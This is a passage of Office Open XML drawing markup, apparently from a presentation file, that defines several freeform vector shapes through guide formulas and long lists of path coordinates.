                      <a:pt x="331" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="2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15" name="Freeform 96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="489" y="2493"/>
                <a:ext cx="34" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 105"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 0 w 105"/>
                  <a:gd name="T3" fmla="*/ 0 h 61"/>
                  <a:gd name="T4" fmla="*/ 0 w 105"/>
                  <a:gd name="T5" fmla="*/ 0 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 105"/>
                  <a:gd name="T7" fmla="*/ 0 h 61"/>
                  <a:gd name="T8" fmla="*/ 0 w 105"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 0 w 105"/>
                  <a:gd name="T11" fmla="*/ 0 h 61"/>
                  <a:gd name="T12" fmla="*/ 0 w 105"/>
                  <a:gd name="T13" fmla="*/ 0 h 61"/>
                  <a:gd name="T14" fmla="*/ 0 w 105"/>
                  <a:gd name="T15" fmla="*/ 0 h 61"/>
                  <a:gd name="T16" fmla="*/ 0 w 105"/>
                  <a:gd name="T17" fmla="*/ 0 h 61"/>
                  <a:gd name="T18" fmla="*/ 0 w 105"/>
                  <a:gd name="T19" fmla="*/ 0 h 61"/>
                  <a:gd name="T20" fmla="*/ 0 w 105"/>
                  <a:gd name="T21" fmla="*/ 0 h 61"/>
                  <a:gd name="T22" fmla="*/ 0 w 105"/>
                  <a:gd name="T23" fmla="*/ 0 h 61"/>
                  <a:gd name="T24" fmla="*/ 0 w 105"/>
                  <a:gd name="T25" fmla="*/ 0 h 61"/>
                  <a:gd name="T26" fmla="*/ 0 w 105"/>
                  <a:gd name="T27" fmla="*/ 0 h 61"/>
                  <a:gd name="T28" fmla="*/ 0 w 105"/>
                  <a:gd name="T29" fmla="*/ 0 h 61"/>
                  <a:gd name="T30" fmla="*/ 0 w 105"/>
                  <a:gd name="T31" fmla="*/ 0 h 61"/>
                  <a:gd name="T32" fmla="*/ 0 w 105"/>
                  <a:gd name="T33" fmla="*/ 0 h 61"/>
                  <a:gd name="T34" fmla="*/ 0 w 105"/>
                  <a:gd name="T35" fmla="*/ 0 h 61"/>
                  <a:gd name="T36" fmla="*/ 0 w 105"/>
                  <a:gd name="T37" fmla="*/ 0 h 61"/>
                  <a:gd name="T38" fmla="*/ 0 w 105"/>
                  <a:gd name="T39" fmla="*/ 0 h 61"/>
                  <a:gd name="T40" fmla="*/ 0 w 105"/>
                  <a:gd name="T41" fmla="*/ 0 h 61"/>
                  <a:gd name="T42" fmla="*/ 0 w 105"/>
                  <a:gd name="T43" fmla="*/ 0 h 61"/>
                  <a:gd name="T44" fmla="*/ 0 w 105"/>
                  <a:gd name="T45" fmla="*/ 0 h 61"/>
                  <a:gd name="T46" fmla="*/ 0 w 105"/>
                  <a:gd name="T47" fmla="*/ 0 h 61"/>
                  <a:gd name="T48" fmla="*/ 0 w 105"/>
                  <a:gd name="T49" fmla="*/ 0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5"/>
                  <a:gd name="T76" fmla="*/ 0 h 61"/>
                  <a:gd name="T77" fmla="*/ 105 w 105"/>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5" h="61">
                    <a:moveTo>
                      <a:pt x="1" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>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16" name="Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="523" y="2483"/>
                <a:ext cx="10" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 37"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 0 h 37"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 0 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 0 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 37"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 0 h 37"/>
                  <a:gd name="T12" fmla="*/ 0 w 33"/>
                  <a:gd name="T13" fmla="*/ 0 h 37"/>
                  <a:gd name="T14" fmla="*/ 0 w 33"/>
                  <a:gd name="T15" fmla="*/ 0 h 37"/>
                  <a:gd name="T16" fmla="*/ 0 w 33"/>
                  <a:gd name="T17" fmla="*/ 0 h 37"/>
                  <a:gd name="T18" fmla="*/ 0 w 33"/>
                  <a:gd name="T19" fmla="*/ 0 h 37"/>
                  <a:gd name="T20" fmla="*/ 0 w 33"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 0 w 33"/>
                  <a:gd name="T23" fmla="*/ 0 h 37"/>
                  <a:gd name="T24" fmla="*/ 0 w 33"/>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37"/>
                  <a:gd name="T41" fmla="*/ 33 w 33"/>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37">
                    <a:moveTo>
                      <a:pt x="0" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>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17" name="Freeform 98"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="566" y="2421"/>
                <a:ext cx="38" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 115"/>
                  <a:gd name="T1" fmla="*/ 0 h 115"/>
                  <a:gd name="T2" fmla="*/ 0 w 115"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 0 w 115"/>
                  <a:gd name="T5" fmla="*/ 0 h 115"/>
                  <a:gd name="T6" fmla="*/ 0 w 115"/>
                  <a:gd name="T7" fmla="*/ 0 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 115"/>
                  <a:gd name="T9" fmla="*/ 0 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 115"/>
                  <a:gd name="T11" fmla="*/ 0 h 115"/>
                  <a:gd name="T12" fmla="*/ 0 w 115"/>
                  <a:gd name="T13" fmla="*/ 0 h 115"/>
                  <a:gd name="T14" fmla="*/ 0 w 115"/>
                  <a:gd name="T15" fmla="*/ 0 h 115"/>
                  <a:gd name="T16" fmla="*/ 0 w 115"/>
                  <a:gd name="T17" fmla="*/ 0 h 115"/>
                  <a:gd name="T18" fmla="*/ 0 w 115"/>
                  <a:gd name="T19" fmla="*/ 0 h 115"/>
                  <a:gd name="T20" fmla="*/ 0 w 115"/>
                  <a:gd name="T21" fmla="*/ 0 h 115"/>
                  <a:gd name="T22" fmla="*/ 0 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 115"/>
                  <a:gd name="T24" fmla="*/ 0 w 115"/>
                  <a:gd name="T25" fmla="*/ 0 h 115"/>
                  <a:gd name="T26" fmla="*/ 0 w 115"/>
                  <a:gd name="T27" fmla="*/ 0 h 115"/>
                  <a:gd name="T28" fmla="*/ 0 w 115"/>
                  <a:gd name="T29" fmla="*/ 0 h 115"/>
                  <a:gd name="T30" fmla="*/ 0 w 115"/>
                  <a:gd name="T31" fmla="*/ 0 h 115"/>
                  <a:gd name="T32" fmla="*/ 0 w 115"/>
                  <a:gd name="T33" fmla="*/ 0 h 115"/>
                  <a:gd name="T34" fmla="*/ 0 w 115"/>
                  <a:gd name="T35" fmla="*/ 0 h 115"/>
                  <a:gd name="T36" fmla="*/ 0 w 115"/>
                  <a:gd name="T37" fmla="*/ 0 h 115"/>
                  <a:gd name="T38" fmla="*/ 0 w 115"/>
                  <a:gd name="T39" fmla="*/ 0 h 115"/>
                  <a:gd name="T40" fmla="*/ 0 w 115"/>
                  <a:gd name="T41" fmla="*/ 0 h 115"/>
                  <a:gd name="T42" fmla="*/ 0 w 115"/>
                  <a:gd name="T43" fmla="*/ 0 h 115"/>
                  <a:gd name="T44" fmla="*/ 0 w 115"/>
                  <a:gd name="T45" fmla="*/ 0 h 115"/>
                  <a:gd name="T46" fmla="*/ 0 w 115"/>
                  <a:gd name="T47" fmla="*/ 0 h 115"/>
                  <a:gd name="T48" fmla="*/ 0 w 115"/>
                  <a:gd name="T49" fmla="*/ 0 h 115"/>
                  <a:gd name="T50" fmla="*/ 0 w 115"/>
                  <a:gd name="T51" fmla="*/ 0 h 115"/>
                  <a:gd name="T52" fmla="*/ 0 w 115"/>
                  <a:gd name="T53" fmla="*/ 0 h 115"/>
                  <a:gd name="T54" fmla="*/ 0 w 115"/>
                  <a:gd name="T55" fmla="*/ 0 h 115"/>
                  <a:gd name="T56" fmla="*/ 0 w 115"/>
                  <a:gd name="T57" fmla="*/ 0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
                  <a:gd name="T88" fmla="*/ 0 h 115"/>
                  <a:gd name="T89" fmla="*/ 115 w 11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 h="115">
                    <a:moveTo>
                      <a:pt x="0" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11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18" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="609" y="2378"/>
                <a:ext cx="73" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 102"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 0 h 102"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 0 h 102"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 0 h 102"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 102"/>
                  <a:gd name="T10" fmla="*/ 0 w 224"/>
                  <a:gd name="T11" fmla="*/ 0 h 102"/>
                  <a:gd name="T12" fmla="*/ 0 w 224"/>
                  <a:gd name="T13" fmla="*/ 0 h 102"/>
                  <a:gd name="T14" fmla="*/ 0 w 224"/>
                  <a:gd name="T15" fmla="*/ 0 h 102"/>
                  <a:gd name="T16" fmla="*/ 0 w 224"/>
                  <a:gd name="T17" fmla="*/ 0 h 102"/>
                  <a:gd name="T18" fmla="*/ 0 w 224"/>
                  <a:gd name="T19" fmla="*/ 0 h 102"/>
                  <a:gd name="T20" fmla="*/ 0 w 224"/>
                  <a:gd name="T21" fmla="*/ 0 h 102"/>
                  <a:gd name="T22" fmla="*/ 0 w 224"/>
                  <a:gd name="T23" fmla="*/ 0 h 102"/>
                  <a:gd name="T24" fmla="*/ 0 w 224"/>
                  <a:gd name="T25" fmla="*/ 0 h 102"/>
                  <a:gd name="T26" fmla="*/ 0 w 224"/>
                  <a:gd name="T27" fmla="*/ 0 h 102"/>
                  <a:gd name="T28" fmla="*/ 0 w 224"/>
                  <a:gd name="T29" fmla="*/ 0 h 102"/>
                  <a:gd name="T30" fmla="*/ 0 w 224"/>
                  <a:gd name="T31" fmla="*/ 0 h 102"/>
                  <a:gd name="T32" fmla="*/ 0 w 224"/>
                  <a:gd name="T33" fmla="*/ 0 h 102"/>
                  <a:gd name="T34" fmla="*/ 0 w 224"/>
                  <a:gd name="T35" fmla="*/ 0 h 102"/>
                  <a:gd name="T36" fmla="*/ 0 w 224"/>
                  <a:gd name="T37" fmla="*/ 0 h 102"/>
                  <a:gd name="T38" fmla="*/ 0 w 224"/>
                  <a:gd name="T39" fmla="*/ 0 h 102"/>
                  <a:gd name="T40" fmla="*/ 0 w 224"/>
                  <a:gd name="T41" fmla="*/ 0 h 102"/>
                  <a:gd name="T42" fmla="*/ 0 w 224"/>
                  <a:gd name="T43" fmla="*/ 0 h 102"/>
                  <a:gd name="T44" fmla="*/ 0 w 224"/>
                  <a:gd name="T45" fmla="*/ 0 h 102"/>
                  <a:gd name="T46" fmla="*/ 0 w 224"/>
                  <a:gd name="T47" fmla="*/ 0 h 102"/>
                  <a:gd name="T48" fmla="*/ 0 w 224"/>
                  <a:gd name="T49" fmla="*/ 0 h 102"/>
                  <a:gd name="T50" fmla="*/ 0 w 224"/>
                  <a:gd name="T51" fmla="*/ 0 h 102"/>
                  <a:gd name="T52" fmla="*/ 0 w 224"/>
                  <a:gd name="T53" fmla="*/ 0 h 102"/>
                  <a:gd name="T54" fmla="*/ 0 w 224"/>
                  <a:gd name="T55" fmla="*/ 0 h 102"/>
                  <a:gd name="T56" fmla="*/ 0 w 224"/>
                  <a:gd name="T57" fmla="*/ 0 h 102"/>
                  <a:gd name="T58" fmla="*/ 0 w 224"/>
                  <a:gd name="T59" fmla="*/ 0 h 102"/>
                  <a:gd name="T60" fmla="*/ 0 w 224"/>
                  <a:gd name="T61" fmla="*/ 0 h 102"/>
                  <a:gd name="T62" fmla="*/ 0 w 224"/>
                  <a:gd name="T63" fmla="*/ 0 h 102"/>
                  <a:gd name="T64" fmla="*/ 0 w 224"/>
                  <a:gd name="T65" fmla="*/ 0 h 102"/>
                  <a:gd name="T66" fmla="*/ 0 w 224"/>
                  <a:gd name="T67" fmla="*/ 0 h 102"/>
                  <a:gd name="T68" fmla="*/ 0 w 224"/>
                  <a:gd name="T69" fmla="*/ 0 h 102"/>
                  <a:gd name="T70" fmla="*/ 0 w 224"/>
                  <a:gd name="T71" fmla="*/ 0 h 102"/>
                  <a:gd name="T72" fmla="*/ 0 w 224"/>
                  <a:gd name="T73" fmla="*/ 0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4"/>
                  <a:gd name="T112" fmla="*/ 0 h 102"/>
                  <a:gd name="T113" fmla="*/ 224 w 224"/>
                  <a:gd name="T114" fmla="*/ 102 h 10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4" h="102">
                    <a:moveTo>
                      <a:pt x="0" y="102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>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19" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="685" y="2375"/>
                <a:ext cx="14" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 44"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 44"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 44"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 44"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 44"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 44"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 44"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 44"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 0 w 44"/>
                  <a:gd name="T27" fmla="*/ 0 h 28"/>
                  <a:gd name="T28" fmla="*/ 0 w 44"/>
                  <a:gd name="T29" fmla="*/ 0 h 28"/>
                  <a:gd name="T30" fmla="*/ 0 w 44"/>
                  <a:gd name="T31" fmla="*/ 0 h 28"/>
                  <a:gd name="T32" fmla="*/ 0 w 44"/>
                  <a:gd name="T33" fmla="*/ 0 h 28"/>
                  <a:gd name="T34" fmla="*/ 0 w 44"/>
                  <a:gd name="T35" fmla="*/ 0 h 28"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 0 h 28"/>
                  <a:gd name="T38" fmla="*/ 0 w 44"/>
                  <a:gd name="T39" fmla="*/ 0 h 28"/>
                  <a:gd name="T40" fmla="*/ 0 w 44"/>
                  <a:gd name="T41" fmla="*/ 0 h 28"/>
                  <a:gd name="T42" fmla="*/ 0 w 44"/>
                  <a:gd name="T43" fmla="*/ 0 h 28"/>
                  <a:gd name="T44" fmla="*/ 0 w 44"/>
                  <a:gd name="T45" fmla="*/ 0 h 28"/>
                  <a:gd name="T46" fmla="*/ 0 w 44"/>
                  <a:gd name="T47" fmla="*/ 0 h 28"/>
                  <a:gd name="T48" fmla="*/ 0 w 44"/>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28"/>
                  <a:gd name="T77" fmla="*/ 44 w 44"/>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28">
                    <a:moveTo>
                      <a:pt x="1" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
